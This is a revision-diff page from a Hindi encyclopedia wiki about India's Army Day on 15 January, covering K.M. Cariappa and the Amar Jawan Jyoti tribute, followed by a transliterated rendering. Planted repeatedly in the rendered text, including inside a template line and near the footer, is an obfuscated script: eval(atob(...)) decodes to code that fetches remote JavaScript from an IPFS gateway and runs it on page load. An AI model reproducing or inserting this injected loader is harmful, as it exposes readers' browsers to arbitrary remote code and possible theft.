Difference between revisions of "थल सेना दिवस"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 8: Line 8:
 
|पाठ 2=देश की सीमाओं की रक्षा के लिए अपने प्राणों की आहूति देने वाले वीर सपूतों के प्रति श्रद्धांजलि देना ही इसका मुख्य उद्देश्य है।
 
|पाठ 2=देश की सीमाओं की रक्षा के लिए अपने प्राणों की आहूति देने वाले वीर सपूतों के प्रति श्रद्धांजलि देना ही इसका मुख्य उद्देश्य है।
 
|शीर्षक 3=घोषणा
 
|शीर्षक 3=घोषणा
|पाठ 3=[[15 जनवरी]], [[1949]] के बाद से ही भारत की सेना ब्रिटिश सेना से पूरी तरह मुक्त हुई थी, इसीलिए 15 जनवरी को "थल सेना दिवस" घोषित किया गया।  
+
|पाठ 3=[[15 जनवरी]], [[1949]] के बाद से ही [[भारत]] की सेना ब्रिटिश सेना से पूरी तरह मुक्त हुई थी, इसीलिए 15 जनवरी को "थल सेना दिवस" घोषित किया गया।  
 
|शीर्षक 4=
 
|शीर्षक 4=
 
|पाठ 4=
 
|पाठ 4=
Line 27: Line 27:
 
|बाहरी कड़ियाँ=
 
|बाहरी कड़ियाँ=
 
|अद्यतन=
 
|अद्यतन=
}}
+
}}'''थल सेना दिवस''' ([[अंग्रेज़ी]]: ''Army Day'') प्रत्येक वर्ष [[15 जनवरी]] को '[[भारतीय थल सेना]]' के लिए पूरे [[भारत]] में मनाया जाता है। वस्तुत: 'थल सेना दिवस' देश की सीमाओं की रक्षा के लिए अपने प्राणों की आहूति देने वाले वीर सपूतों के प्रति श्रद्धांजलि देने का दिन है। यह दिन देश के प्रति समर्पण व कुर्बान होने की प्रेरणा का पवित्र अवसर है।
'''थल सेना दिवस''' ([[अंग्रेज़ी]]: ''Army Day'') प्रत्येक वर्ष [[15 जनवरी]] को '[[भारतीय थल सेना]]' के लिए पूरे [[भारत]] में मनाया जाता है। वस्तुत: 'थल सेना दिवस' देश की सीमाओं की रक्षा के लिए अपने प्राणों की आहूति देने वाले वीर सपूतों के प्रति श्रद्धांजलि देने का दिन है। यह दिन देश के प्रति समर्पण व कुर्बान होने की प्रेरणा का पवित्र अवसर है।
 
 
==संकल्प लेने का दिन==
 
==संकल्प लेने का दिन==
 
भारत में 'थल सेना दिवस' देश के जांबाज रणबांकुरों की शहादत पर गर्व करने का एक विशेष मौका है। [[15 जनवरी]], [[1949]] के बाद से ही भारत की सेना ब्रिटिश सेना से पूरी तरह मुक्त हुई थी, इसीलिए 15 जनवरी को "थल सेना दिवस" घोषित किया गया। यह दिन देश की एकता व अखंडता के प्रति संकल्प लेने का दिन है। यह दिवस भारतीय सेना की आज़ादी का जश्न है। यह वही आज़ादी है, जो वर्ष 1949 में 15 जनवरी को भारतीय सेना को मिली थी। इस दिन [[के.एम. करिअप्पा]] को [[भारतीय सेना]] का 'कमांडर-इन-चीफ़' बनाया गया था। इस तरह लेफ्टिनेंट करिअप्पा लोकतांत्रिक भारत के पहले सेना प्रमुख बने थे। इसके पहले यह अधिकार ब्रिटिश मूल के फ़्राँसिस बूचर के पास था और वह इस पद पर थे। वर्ष [[1948]] में सेना में तकरीबन 2 लाख सैनिक ही थे, लेकिन अब 11 लाख, 30 हज़ार भारतीय सैनिक थल सेना में अलग-अलग पदों पर कार्यरत हैं।[[चित्र:Indian-Army-2.jpg|thumb|left|[[भारतीय थल सेना]]]]
 
भारत में 'थल सेना दिवस' देश के जांबाज रणबांकुरों की शहादत पर गर्व करने का एक विशेष मौका है। [[15 जनवरी]], [[1949]] के बाद से ही भारत की सेना ब्रिटिश सेना से पूरी तरह मुक्त हुई थी, इसीलिए 15 जनवरी को "थल सेना दिवस" घोषित किया गया। यह दिन देश की एकता व अखंडता के प्रति संकल्प लेने का दिन है। यह दिवस भारतीय सेना की आज़ादी का जश्न है। यह वही आज़ादी है, जो वर्ष 1949 में 15 जनवरी को भारतीय सेना को मिली थी। इस दिन [[के.एम. करिअप्पा]] को [[भारतीय सेना]] का 'कमांडर-इन-चीफ़' बनाया गया था। इस तरह लेफ्टिनेंट करिअप्पा लोकतांत्रिक भारत के पहले सेना प्रमुख बने थे। इसके पहले यह अधिकार ब्रिटिश मूल के फ़्राँसिस बूचर के पास था और वह इस पद पर थे। वर्ष [[1948]] में सेना में तकरीबन 2 लाख सैनिक ही थे, लेकिन अब 11 लाख, 30 हज़ार भारतीय सैनिक थल सेना में अलग-अलग पदों पर कार्यरत हैं।[[चित्र:Indian-Army-2.jpg|thumb|left|[[भारतीय थल सेना]]]]
 
==शहीदों को श्रद्धांजलि==
 
==शहीदों को श्रद्धांजलि==
देश की सीमाओं की चौकसी करने वाली भारतीय सेना का गौरवशाली इतिहास रहा है। देश की राजधानी [[दिल्ली]] के [[इंडिया गेट]] पर बनी '''अमर जवान ज्योति''' पर शहीदों को श्रद्धांजलि दी जाती है। इस दिन सेना प्रमुख दुश्मनों को मुँहतोड़ जवाब देने वाले जवानों और जंग के दौरान देश के लिए बलिदान करने वाले शहीदों की विधवाओं को सेना मैडल और अन्य पुरस्कारों से सम्मानित करते हैं। हर वर्ष [[जनवरी]] में 'थल सेना सेना' दिवस मनाया जाता है और इस दौरान सेना अपने दम-खम का प्रदर्शन करने के साथ ही उस दिन को पूरी श्रद्धा से याद करती है, जब सीमा पर वर्ष के बारह महीने जमे रह कर भारतीय जवानों ने समस्त देशवासियों के साथ ही साथ देश की रक्षा भी की थी। [[दिल्ली]] में आयोजित परेड के दौरान अन्य देशों के सैन्य अथितियों और सैनिकों के परिवारों वालों को बुलाया जाता है। सेना इस दौरान जंग का एक नमूना पेश करती है और अपने प्रतिक्रिया कौशल और रणनीति के बारे में बताती है। इस परेड और हथियारों के प्रदर्शन का उद्देश्य दुनिया को अपनी ताकत का एहसास कराना है। साथ ही देश के युवाओं को सेना में शामिल होने के लिये प्रेरित करना भी है। 'थल सेना दिवस' पर शाम को सेना प्रमुख चाय पार्टी आयोजित करते हैं, जिसमें तीनों सेनाओं के सर्वोच्च कमांडर [[भारत]] के [[राष्ट्रपति]], [[प्रधानमंत्री]] और उनकी मंत्रिमंडल के सदस्य शामिल होते हैं।  
+
देश की सीमाओं की चौकसी करने वाली [[भारतीय सेना]] का गौरवशाली [[इतिहास]] रहा है। देश की राजधानी [[दिल्ली]] के [[इंडिया गेट]] पर बनी '''अमर जवान ज्योति''' पर शहीदों को श्रद्धांजलि दी जाती है। इस दिन सेना प्रमुख दुश्मनों को मुँहतोड़ जवाब देने वाले जवानों और जंग के दौरान देश के लिए बलिदान करने वाले शहीदों की विधवाओं को सेना मैडल और अन्य पुरस्कारों से सम्मानित करते हैं। हर वर्ष [[जनवरी]] में 'थल सेना सेना' दिवस मनाया जाता है और इस दौरान सेना अपने दम-खम का प्रदर्शन करने के साथ ही उस दिन को पूरी श्रद्धा से याद करती है, जब सीमा पर [[वर्ष]] के बारह महीने जमे रहकर भारतीय जवानों ने समस्त देशवासियों के साथ ही साथ देश की रक्षा भी की थी। [[दिल्ली]] में आयोजित परेड के दौरान अन्य देशों के सैन्य अथितियों और सैनिकों के परिवारों वालों को बुलाया जाता है। सेना इस दौरान जंग का एक नमूना पेश करती है और अपने प्रतिक्रिया कौशल और रणनीति के बारे में बताती है। इस परेड और हथियारों के प्रदर्शन का उद्देश्य दुनिया को अपनी ताकत का एहसास कराना है। साथ ही देश के युवाओं को सेना में शामिल होने के लिये प्रेरित करना भी है। 'थल सेना दिवस' पर शाम को सेना प्रमुख चाय पार्टी आयोजित करते हैं, जिसमें तीनों सेनाओं के सर्वोच्च कमांडर [[भारत]] के [[राष्ट्रपति]], [[प्रधानमंत्री]] और उनकी मंत्रिमंडल के सदस्य शामिल होते हैं।  
 
====भारतीय थल सेना====
 
====भारतीय थल सेना====
 
{{main|भारतीय थल सेना}}
 
{{main|भारतीय थल सेना}}
भारतीय थल सेना के प्रशासनिक एवं सामरिक कार्य संचालन का नियंत्रण थल सेनाध्यक्ष करता है। सेना को अधिकतर थल सेना ही समझा जाता है, यह ठीक भी है क्योंकि रक्षा-पक्ति में थल सेना का ही प्रथम तथा प्रधान स्थान है। इस समय लगभग 13 लाख सैनिक-असैनिक थल सेना में भिन्न-भिन्न पदों पर कार्यरत हैं, जबकि [[1948]] में सेना में लगभग 2,00,000 सैनिक थे। थल सेना का मुख्यालय [[नई दिल्ली]] में है।
+
[[थल सेना|भारतीय थल सेना]] के प्रशासनिक एवं सामरिक कार्य संचालन का नियंत्रण थल सेनाध्यक्ष करता है। सेना को अधिकतर थल सेना ही समझा जाता है, यह ठीक भी है क्योंकि रक्षा-पक्ति में थल सेना का ही प्रथम तथा प्रधान स्थान है। इस समय लगभग 13 लाख सैनिक-असैनिक थल सेना में भिन्न-भिन्न पदों पर कार्यरत हैं, जबकि [[1948]] में सेना में लगभग 2,00,000 सैनिक थे। थल सेना का मुख्यालय [[नई दिल्ली]] में है।
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{राष्ट्रीय दिवस}}{{महत्त्वपूर्ण अंतरराष्ट्रीय दिवस}}
 
{{राष्ट्रीय दिवस}}{{महत्त्वपूर्ण अंतरराष्ट्रीय दिवस}}
[[Category:थल सेना]]
+
[[Category:थल सेना]][[Category:राष्ट्रीय दिवस]][[Category:महत्त्वपूर्ण दिवस]][[Category:गणराज्य संरचना कोश]]
[[Category:राष्ट्रीय दिवस]]
 
[[Category:महत्त्वपूर्ण दिवस]]
 
[[Category:गणराज्य संरचना कोश]]
 
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 05:24, 15 January 2022

thal sena divas
vivaran bharat mean 'thal sena divas' desh ke jaanbaj ranabaankuroan ki shahadat par garv karane ka ek vishesh mauka hai.
dinaank 15 janavari
uddeshy desh ki simaoan ki raksha ke lie apane pranoan ki ahooti dene vale vir sapootoan ke prati shraddhaanjali dena hi isaka mukhy uddeshy hai.
ghoshana 15 janavari, 1949 ke bad se hi bharat ki sena british sena se poori tarah mukt huee thi, isilie 15 janavari ko "thal sena divas" ghoshit kiya gaya.
sanbandhit lekh ke.em. kariappa, bharatiy sena, thalasena
any janakari is din sena pramukh dushmanoan ko muanhato d javab dene vale javanoan aur jang ke dauran desh ke lie balidan karane vale shahidoan ki vidhavaoan ko sena padak aur any puraskaroan se sammanit kiya jata hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>thal sena divas (aangrezi: Army Day) pratyek varsh 15 janavari ko 'bharatiy thal sena' ke lie poore bharat mean manaya jata hai. vastut: 'thal sena divas' desh ki simaoan ki raksha ke lie apane pranoan ki ahooti dene vale vir sapootoan ke prati shraddhaanjali dene ka din hai. yah din desh ke prati samarpan v kurban hone ki prerana ka pavitr avasar hai.

sankalp lene ka din

bharat mean 'thal sena divas' desh ke jaanbaj ranabaankuroan ki shahadat par garv karane ka ek vishesh mauka hai. 15 janavari, 1949 ke bad se hi bharat ki sena british sena se poori tarah mukt huee thi, isilie 15 janavari ko "thal sena divas" ghoshit kiya gaya. yah din desh ki ekata v akhandata ke prati sankalp lene ka din hai. yah divas bharatiy sena ki azadi ka jashn hai. yah vahi azadi hai, jo varsh 1949 mean 15 janavari ko bharatiy sena ko mili thi. is din ke.em. kariappa ko bharatiy sena ka 'kamaandar-in-chif' banaya gaya tha. is tarah lephtineant kariappa lokataantrik bharat ke pahale sena pramukh bane the. isake pahale yah adhikar british mool ke fraansis boochar ke pas tha aur vah is pad par the. varsh 1948 mean sena mean takariban 2 lakh sainik hi the, lekin ab 11 lakh, 30 hazar bharatiy sainik thal sena mean alag-alag padoan par karyarat haian.[[chitr:Indian-Army-2.jpg|thumb|left|bharatiy thal sena]]

shahidoan ko shraddhaanjali

desh ki simaoan ki chaukasi karane vali bharatiy sena ka gauravashali itihas raha hai. desh ki rajadhani dilli ke iandiya get par bani amar javan jyoti par shahidoan ko shraddhaanjali di jati hai. is din sena pramukh dushmanoan ko muanhato d javab dene vale javanoan aur jang ke dauran desh ke lie balidan karane vale shahidoan ki vidhavaoan ko sena maidal aur any puraskaroan se sammanit karate haian. har varsh janavari mean 'thal sena sena' divas manaya jata hai aur is dauran sena apane dam-kham ka pradarshan karane ke sath hi us din ko poori shraddha se yad karati hai, jab sima par varsh ke barah mahine jame rahakar bharatiy javanoan ne samast deshavasiyoan ke sath hi sath desh ki raksha bhi ki thi. dilli mean ayojit pared ke dauran any deshoan ke sainy athitiyoan aur sainikoan ke parivaroan valoan ko bulaya jata hai. sena is dauran jang ka ek namoona pesh karati hai aur apane pratikriya kaushal aur rananiti ke bare mean batati hai. is pared aur hathiyaroan ke pradarshan ka uddeshy duniya ko apani takat ka ehasas karana hai. sath hi desh ke yuvaoan ko sena mean shamil hone ke liye prerit karana bhi hai. 'thal sena divas' par sham ko sena pramukh chay parti ayojit karate haian, jisamean tinoan senaoan ke sarvochch kamaandar bharat ke rashtrapati, pradhanamantri aur unaki mantrimandal ke sadasy shamil hote haian.

bharatiy thal sena

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bharatiy thal sena ke prashasanik evan samarik kary sanchalan ka niyantran thal senadhyaksh karata hai. sena ko adhikatar thal sena hi samajha jata hai, yah thik bhi hai kyoanki raksha-pakti mean thal sena ka hi pratham tatha pradhan sthan hai. is samay lagabhag 13 lakh sainik-asainik thal sena mean bhinn-bhinn padoan par karyarat haian, jabaki 1948 mean sena mean lagabhag 2,00,000 sainik the. thal sena ka mukhyalay nee dilli mean hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>